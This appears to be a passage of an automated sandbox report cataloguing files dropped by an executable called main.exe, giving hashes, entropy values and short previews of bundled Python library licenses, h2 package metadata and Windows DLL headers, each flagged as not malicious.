                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1532
                                                                                                                                                                                                                                                      Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                      MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                      SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                      SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                      SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8292864
                                                                                                                                                                                                                                                      Entropy (8bit):6.493076254122072
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
                                                                                                                                                                                                                                                      MD5:34293B976DA366D83C12D8EE05DE7B03
                                                                                                                                                                                                                                                      SHA1:82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
                                                                                                                                                                                                                                                      SHA-256:A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
                                                                                                                                                                                                                                                      SHA-512:0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.R\..n"......~Z.......................................~...........`...........................................x.X.....x...............y...............~.......o.T.....................o.(...p.o.@............p\.8............................text....Q\......R\................. ..`.rdata..P9...p\..:...V\.............@..@.data... >....x.......x.............@....pdata........y.......y.............@..@.reloc........~.......}.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1102
                                                                                                                                                                                                                                                      Entropy (8bit):5.120351253767657
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:bOLRrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bOLRaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                                                                      MD5:AA3B9B4395563DD427BE5F022EC321C1
                                                                                                                                                                                                                                                      SHA1:80129BCE9030CF215FC93006DCE98B0BA8C778F8
                                                                                                                                                                                                                                                      SHA-256:7A65A5AF0CBABF1C16251C7C6B2B7CB46D16A7222E79975B9B61FCD66A2E3F28
                                                                                                                                                                                                                                                      SHA-512:62337AD684E4AA1192DBA00503EED316F28F6480ACEA90442774BE544C970C3F9012933B451C036DB3AC388C495153D6C9FA04E1844E0A483E8E767218B90690
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:The MIT License (MIT)..Copyright (c) 2015-2020 Cory Benfield and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3583
                                                                                                                                                                                                                                                      Entropy (8bit):4.978673419311688
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:D7evWamPktjxsxMMrgfHcxfS+UvWQH46o1WvUXCR:+RsMCgfGfS+UvW63MyR
                                                                                                                                                                                                                                                      MD5:566784A778E8B69F205F14DAC1D57817
                                                                                                                                                                                                                                                      SHA1:B1B850F3D43CC453086BED7034675426F81C9BDE
                                                                                                                                                                                                                                                      SHA-256:C504EAA29585F6BDD95644FEC420C7016599401DE0FF3CAA80AC429748A847A4
                                                                                                                                                                                                                                                      SHA-512:CFD127A2868E94E5F4FAFAB78A3153094D45F6538AE77642ADE9FABC5580D47DA2EC40A2EB7BF11FD6F5A21553A4489F5278B76AC017D738B64C4C9579B38D55
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: h2.Version: 4.1.0.Summary: HTTP/2 State-Machine based protocol implementation.Home-page: https://github.com/python-hyper/h2.Author: Cory Benfield.Author-email: cory@lukasa.co.uk.License: MIT License.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Requires-Python: >=3.6.1.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: hyperframe (<7,>=6.0).
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):5.821419256958962
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:pnuXipSpe7lLCDHpks2hT429PTW/2B7V0Wh85dGlLt4qYt29tw:sXEFgH6hT42VTW/2tV0MmdGlLtnY89m
                                                                                                                                                                                                                                                      MD5:60608F300F680A44E19E60188CFB1274
                                                                                                                                                                                                                                                      SHA1:56CFF7648824FCFAC20DE09BF76A8D4CBD32A42A
                                                                                                                                                                                                                                                      SHA-256:A38FC50F66CFA01BED1E2D81F6778ECE33FAF9729E12381B31DCAB8AB1C6A26B
                                                                                                                                                                                                                                                      SHA-512:C7DF7F333243F3B868160B814ACF04C4CC1CEC772E62B06282DD8E24AC873DAD569F4456A2D003D8F1BEC9AE74875C725E3910F62BF2B61101D86029C4E36BAB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:h2-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..h2-4.1.0.dist-info/LICENSE,sha256=emWlrwy6vxwWJRx8ayt8tG0WpyIueZdbm2H81mouPyg,1102..h2-4.1.0.dist-info/METADATA,sha256=xQTqopWF9r3ZVkT-xCDHAWWZQB3g_zyqgKxCl0ioR6Q,3583..h2-4.1.0.dist-info/RECORD,,..h2-4.1.0.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92..h2-4.1.0.dist-info/top_level.txt,sha256=Hiulx8KxI2jFUM1dG7-CZeRkO3j50MBwCLG36Vrq-kI,3..h2/__init__.py,sha256=inV-bCAUhD_QGjQe5Mk8gl7F85v26UW9W3BHov9vBAA,86..h2/__pycache__/__init__.cpython-311.pyc,,..h2/__pycache__/config.cpython-311.pyc,,..h2/__pycache__/connection.cpython-311.pyc,,..h2/__pycache__/errors.cpython-311.pyc,,..h2/__pycache__/events.cpython-311.pyc,,..h2/__pycache__/exceptions.cpython-311.pyc,,..h2/__pycache__/frame_buffer.cpython-311.pyc,,..h2/__pycache__/settings.cpython-311.pyc,,..h2/__pycache__/stream.cpython-311.pyc,,..h2/__pycache__/utilities.cpython-311.pyc,,..h2/__pycache__/windows.cpython-311.pyc,,..h2/config
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):92
                                                                                                                                                                                                                                                      Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX7MWcSlViHoKKjP+tPCCfA5S:RtBMwlViQWBBf
                                                                                                                                                                                                                                                      MD5:11AA48DBE7E7CC631B11DD66DC493AEB
                                                                                                                                                                                                                                                      SHA1:249FDB01AD3E3F71356E33E1897D06F23CFB20C2
                                                                                                                                                                                                                                                      SHA-256:3AA464174798E461ECB0CA2B16395B4C8AB4EF6BE91E917AD1F21003A952F710
                                                                                                                                                                                                                                                      SHA-512:EDD5892C9B2FE1F2439C53D2CD05F4478EC360885054BD06AFCF7936F6D066377FEE07796DAE9ECDF810E3D6100E039CAD48F00AD0E3145693D53E844CC5319D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3
                                                                                                                                                                                                                                                      Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Vn:V
                                                                                                                                                                                                                                                      MD5:4217C1CE78C1E6BAE73FE12CE19C51D3
                                                                                                                                                                                                                                                      SHA1:8BA0141FFAA18F4355DB911606B6B283D9BEF1B1
                                                                                                                                                                                                                                                      SHA-256:1E2BA5C7C2B12368C550CD5D1BBF8265E4643B78F9D0C07008B1B7E95AEAFA42
                                                                                                                                                                                                                                                      SHA-512:E735248AA6CC62335983C38AC04631F512B1444D3FACD5FE00064F6649D9382CC8A1661BFEF4978156B2BBD93C27FCDFD581416B05EBC91B59FEFD3C51207067
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:h2.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5209352
                                                                                                                                                                                                                                                      Entropy (8bit):5.8113605800313595
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:UlAXTY8BwEVQ1qb0Oev71CPwDvt3uFRnCLF:UlAXTY8BFVQ1qAOi1CPwDvt3uFRnCLF
                                                                                                                                                                                                                                                      MD5:54CA3E6AFCB3C57C7914C0856D779F2A
                                                                                                                                                                                                                                                      SHA1:E37BE8D92350AA1F9DD3212015DE959FAA58AA2F
                                                                                                                                                                                                                                                      SHA-256:7AED0BC00D2F0CA0DE95EAA6461327BD2E4543723A6CA443A7E899738B353B5A
                                                                                                                                                                                                                                                      SHA-512:E8079E9D4BFA253677A669913F8198882C2EAAF9251F11CFA64EED5597C34AB7C267BED3826AD9F0A83675177A7575AF54081852A5A633D999BD13CF873A79E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................A...A...A....v......p............@.....@....@......@...Rich...........PE..d.....g.........." ...)..4...................................................O......kP...`...........................................G.h8...N.,.....N.s....pK.4....NO../....N.......C.8...........................P.C.@.............N..............................text.....4.......4................. ..`.rdata........5.......4.............@..@.data........J..J....J.............@....pdata..t%...pK..&....K.............@..@.idata..t'....N..(...<N.............@..@.00cfg..u.....N......dN.............@..@.rsrc...s.....N......fN.............@..@.reloc........N......nN.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5191960
                                                                                                                                                                                                                                                      Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                                      MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                                      SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                                      SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                                      SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):787224
                                                                                                                                                                                                                                                      Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                                      MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                                      SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                                      SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                                      SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.024031964823461
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:atwEf9apwEHklnwEYCm/tJD19g3+ifpWcqguO:n6PS9J8uA2gu
                                                                                                                                                                                                                                                      MD5:A33FFBBC2D260A7C2370E69AB5BA4064
                                                                                                                                                                                                                                                      SHA1:B9D8D5C706A5A516A6F60877792C60795BCD3C90
                                                                                                                                                                                                                                                      SHA-256:FB9A9F06BD313298934651FD84583FEC6A3D3C78BBCF982E33399B6E6648DD7C
                                                                                                                                                                                                                                                      SHA-512:74FA21688EEA31DDEC654CFA205F02FE064C225061428982BB0E9E0F0758003440780C9C959864E1660FD729935D34DFD2BAB25B9ED703504DDFF9F5AB9F4D0A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................X......o..............o.......o.......o......j..............n......n......n4.....n......Rich....................PE..d...Xy.g.........." ...)..................................................................`..........................................9..d...t9..d....`.......P..|............p..<...03...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...0....@.......*..............@....pdata..|....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..<....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):285960
                                                                                                                                                                                                                                                      Entropy (8bit):5.461065382482897
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:4zxBXiKg54fss7LLiIwUaDfS7DfaNX4mDBGMX0Qv77u:2g8L5wRDfS7Dfmoc0cX77u
                                                                                                                                                                                                                                                      MD5:B7A9AD530A12FED36FD741152AE5681B
                                                                                                                                                                                                                                                      SHA1:B7E231D6B54B56C25AEE9FE2D2FD6CE02202FCB0
                                                                                                                                                                                                                                                      SHA-256:AA2C96DD541A3A97789C3BD5F26C0E236B2DF84658995BF4315F69CC0508A76B
                                                                                                                                                                                                                                                      SHA-512:3F790A40BF638C2ED64E2D400FE89AD08DAAF4B9FAE98002062BF577D39A089E09A2C8CAA4698B35C4893D5369248BBE709CA52B1314E087E178F666DC1E12D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..P..e...e...e.4.d.}.e.o.f.w.e.o.a.u.e.o.`._.e.v...u.e.4/d.|.e...d..e.4/a.W.e.4/e.~.e.4/..~.e.4/g.~.e.Rich..e.........................PE..d......g.........." ...).....@......7................................................K....`.............................................`... 8.......`..i.......d ......./...p..........8...............................@............0.. ............................text............................... ..`.rdata..............................@..@.data...a...........................@....pdata...$.......&..................@..@.idata.......0... ..................@..@.00cfg..u....P......................@..@.rsrc...i....`......................@..@.reloc.......p......."..............@..B........................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:MSVC program database ver 7.00, 4096*579 bytes
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3569664
                                                                                                                                                                                                                                                      Entropy (8bit):3.5032339840174664
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:Czce3qZ3MHby9J1a8HbkLtwFgG1vgFNWFPGJU0CsQCX9vanmI+bFuABqg5FLU:C4F1iby9J1fHw5xJIiVanmv7U
                                                                                                                                                                                                                                                      MD5:DB3980C377DC1940CA2507933B7E9ACB
                                                                                                                                                                                                                                                      SHA1:61DE86992BD29D65011C9F4E94A695A204D995CB
                                                                                                                                                                                                                                                      SHA-256:41BCB2B3DEA321B5DCFA107E8DB8842686B61ADE534F802E00ACDF365EC2B2D7
                                                                                                                                                                                                                                                      SHA-512:AD2D72EA3A2ACB8EFB02E5E1FB23BF03B32F46C4E077B184716AEC7435D563F3021D7C1A01307E0CD37EB1A5B6237F08213F8D454B62293060F2599C9E303B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Microsoft C/C++ MSF 7.00...DS...........C...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67072
                                                                                                                                                                                                                                                      Entropy (8bit):5.909516720609218
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:AGsHmR02IvVxv7WCyKm7c5Th4vBHTOvyyaZE:AYIvryCyKx5Th4v5OvyyO
                                                                                                                                                                                                                                                      MD5:7A9632D241AD8B97BB50E8EF6DAC1CA6
                                                                                                                                                                                                                                                      SHA1:29F0D5DE91A84FA58CF45FD134358254B7DA12ED
                                                                                                                                                                                                                                                      SHA-256:DD0CCDEECA681645025CA0F562EA45B5B17A1EBFCF1688CD0647A950A2992E2F
                                                                                                                                                                                                                                                      SHA-512:CA6AE6493961F722C07B2FACF272CAF428FD6BCD51A01C34271A18C5D898409C400E50BBAAB2771CBDC94B20041668BE8137242995C9096E511F635F1EA80BB9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xT..<5..<5..<5..5M7.65..n@..>5..n@..05..n@..45..n@..85...k..>5..wM..-5..<5...5...@..,5...@..=5...@[.=5...@..=5..Rich<5..................PE..d...xDdg.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):199448
                                                                                                                                                                                                                                                      Entropy (8bit):6.367371798703565
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:VK/lLDYZL1p13eiG7eDT9AmNfLVuOgOgOgOgOgOgNltwZSm:VglkZHLVuOgOgOgOgOgOgN0sm
                                                                                                                                                                                                                                                      MD5:79561BC9F70383F8AE073802A321ADFB
                                                                                                                                                                                                                                                      SHA1:5F378F47888E5092598C20C56827419D9F480FA7
                                                                                                                                                                                                                                                      SHA-256:C7C7564F7F874FB660A46384980A2CF28BC3E245CA83628A197CCF861EAB5560
                                                                                                                                                                                                                                                      SHA-512:476C839F544B730C5B133E2AE08112144CAC07B6DFB8332535058F5CBF54CE7ED4A72EFB38E6D56007AE755694B05E81E247D0A10210C993376484A057F2217C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A~..A~..A~..H...M~..G...C~..G...L~..G...I~..G...B~......C~......B~..A~..5~......E~......@~....}.@~......@~..RichA~..........PE..d...f..f.........." ...&..................................................... ......y.....`.............................................P......................$......../..........p3..T...........................02..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....!..........................@....pdata..$...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67352
                                                                                                                                                                                                                                                      Entropy (8bit):6.1463412690318515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:Iw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJS0:v/5k8cnzeJWJIYL0D7Sy7x9
                                                                                                                                                                                                                                                      MD5:7E07C63636A01DF77CD31CFCA9A5C745
